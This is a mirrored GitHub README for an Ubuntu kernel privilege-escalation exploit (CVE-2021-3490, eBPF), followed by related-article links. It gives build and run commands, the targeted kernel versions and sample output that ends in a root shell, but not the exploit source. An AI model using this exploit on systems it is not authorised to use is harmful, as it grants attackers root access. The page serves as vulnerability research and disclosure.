GitHub - chompie1337/Linux_LPE_eBPF_CVE-2021-3490

3 years ago

source link: https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Linux_LPE_eBPF_CVE-2021-3490

LPE exploit for CVE-2021-3490. Tested on Ubuntu 20.10 (Groovy Gorilla) kernels 5.8.0-25.26 through 5.8.0-52.58. and Ubuntu 21.04 (Hirsute Hippo) 5.11.0-16.17. The vulnerability was discovered by Manfred Paul @_manfp and fixed in this commit.

author: @chompie1337

For educational/research purposes only. Use at your own risk.

Usage:

To build for Ubuntu 20.10 (Groovy Gorilla):

make groovy

To build for Ubuntu 21.04 (Hirsute Hippo):

make hirsute

To run:

bin/exploit.bin
[+] eBPF enabled, maps created!
[+] addr of oob BPF array map: ffffa008c1202110
[+] addr of array_map_ops: ffffffff956572a0
[+] kernel read successful!
[!] searching for init_pid_ns in kstrtab ...
[+] addr of init_pid_ns in kstrtab: ffffffff95b03a4a
[!] searching for init_pid_ns in ksymtab...
[+] addr of init_pid_ns ffffffff96062d00
[!] searching for creds for pid: 770
[+] addr of cred structure: ffffa0086758dec0
[!] preparing to overwrite creds...
[+] success! enjoy r00t :)
#

Note: You must cleanly exit the root shell by typing exit to perform cleanup and avoid a kernel panic.

Checkout the writeup Kernel Pwning with eBPF: a Love Story.

This research was sponsered by Grapl.

Recommend

www.tuicool.com 6 years ago
Cache

XIGNCODE3 xhunter1.sys LPE

From leaked kernel-mode process handle to SYSTEM XIGNCODE3 is a popular anti-cheat solution provided on a B2B2C basis, predominantly found in online games. This class of software is known for its invasive natur...

微信 mp.weixin.qq.com 4 years ago
Cache

基于 eBPF 的 Linux 可观测性

最近发布的 Linux 内核带了一个针对内核的能力强大的 Linux 监控框架。它起源于历史上人们所说的的 BPF。 BPF 是什么? BPF (Berkeley Packet Filter) 是一个非常高效的网络包过滤机制，它的目标是避免不必要的用户空...

微信 mp.weixin.qq.com 4 years ago
Cache

eBPF：Linux上的DTrace

引言可能很多工程师都听说过或者用过Solaris上的DTrace，都被其强大的功能，灵活的用法所吸引。但是，多年来Linux上一直没有对应的工具。虽然，systemtap可以部分替代，但是在很多方面systemtap都不尽如人意。不过...

www.brendangregg.com 3 years ago
Cache

Linux bcc/eBPF tcpdrop

Linux bcc/eBPF tcpdrop 31 May 2018 While debugging a production issue of kernel-based TCP packet drops, I remembered seeing a new function added in Linux 4.7 by Eric Dumazet (Google) called tcp_drop(), which I can trace usin...

alephsecurity.com 2 years ago
Cache

Exploiting crash handlers: LPE on Ubuntu

Introduction: In this article we will explore ‘Apport’, the Ubuntu crash handler. When an application crashes Apport is executed by the kernel, reads information about the crashed process, and then creates a crash report that can be...